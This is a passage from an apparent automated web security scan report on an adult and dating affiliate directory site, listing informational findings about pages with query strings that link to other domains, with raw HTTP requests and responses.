<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.20. http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.21. http://www.resellerbase.com/adult/personals-dating/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/personals-dating/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.22. http://www.resellerbase.com/adult/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php
http://www.camsense.com/link.html?ref=1399934
http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939
http://www.datingrev.com/cgi/go.cgi?where=0815
http://www.love-money.de/?id=26660
http://www.loveme.com/go/49557
http://www.spacash.com/?account=resellerbase&fee=flat
http://www.vod-cash.com/?id=26660
http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.worlddatingpartners.com/index.do?refId=RSLLR-6425" name="link_18"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.spacash.com/?account=resellerbase&fee=flat" name="link_30"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.vod-cash.com/?id=26660" name="link_34"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.23. http://www.resellerbase.com/adult/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f

The response contains the following links to other domains:

http://af.nudistfriends.com/i/af6025460
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.6-chats.com/ELT
http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php
http://www.camsense.com/link.html?ref=1399934
http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939
http://www.datingrev.com/cgi/go.cgi?where=0815
http://www.love-money.de/?id=26660
http://www.loveme.com/go/49557
http://www.nemproduction.com/?id=26660
http://www.neondollars.com/track/harrye:wmref:neondollars/

Request

GET /adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1&select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/search.php?cat=7&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 56078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.6-chats.com/ELT" name="link_32"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.6-chats.com/ELT" name="link_32"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php" name="link_35"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.camsense.com/link.html?ref=1399934" name="link_31"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939" name="link_19"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.datingrev.com/cgi/go.cgi?where=0815" name="link_14"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.love-money.de/?id=26660" name="link_33"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.love-money.de/?id=26660" name="link_33"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.loveme.com/go/49557" name="link_22"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.loveme.com/go/49557" name="link_22"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.nemproduction.com/?id=26660" name="link_36"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://www.neondollars.com/track/harrye:wmref:neondollars/" name="link_37"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td width="548" height="20" valign="middle" bgcolor="#ececec">
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><b style="color: #E78502">
...[SNIP]...
<br />
<a href="http://af.NudistFriends.com/i/af6025460" name="link_41"><img src="http://www.resellerbase.com/themes/kosmos/images/bt_visit.gif" border="0" alt="" />
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.24. http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/rating/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.25. http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/review/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.26. http://www.resellerbase.com/adult/themes/kosmos/images/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/images/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.27. http://www.resellerbase.com/adult/themes/kosmos/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/kosmos/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.28. http://www.resellerbase.com/adult/themes/search.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/themes/search.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/adult/themes/search.php?keyword=search...&Submit3=Search&opt=2

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /adult/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.29. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=38

The response contains the following links to other domains:

http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113
http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer

Request

GET /bad_link.php?id=38 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/whitelabelcash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://access.iawsnetwork.com/cgi-bin/access.asp?trace=&site=60&type=100&partenaire=16113"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.30. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=34

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.vod-cash.com/?id=26660

Request

GET /bad_link.php?id=34 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.vod-cash.com/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.31. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=22

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.loveme.com/go/49557

Request

GET /bad_link.php?id=22 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/22/loveme-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.loveme.com/go/49557"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.32. http://www.resellerbase.com/bad_link.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/bad_link.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/bad_link.php?id=36

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.nemproduction.com/?id=26660

Request

GET /bad_link.php?id=36 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
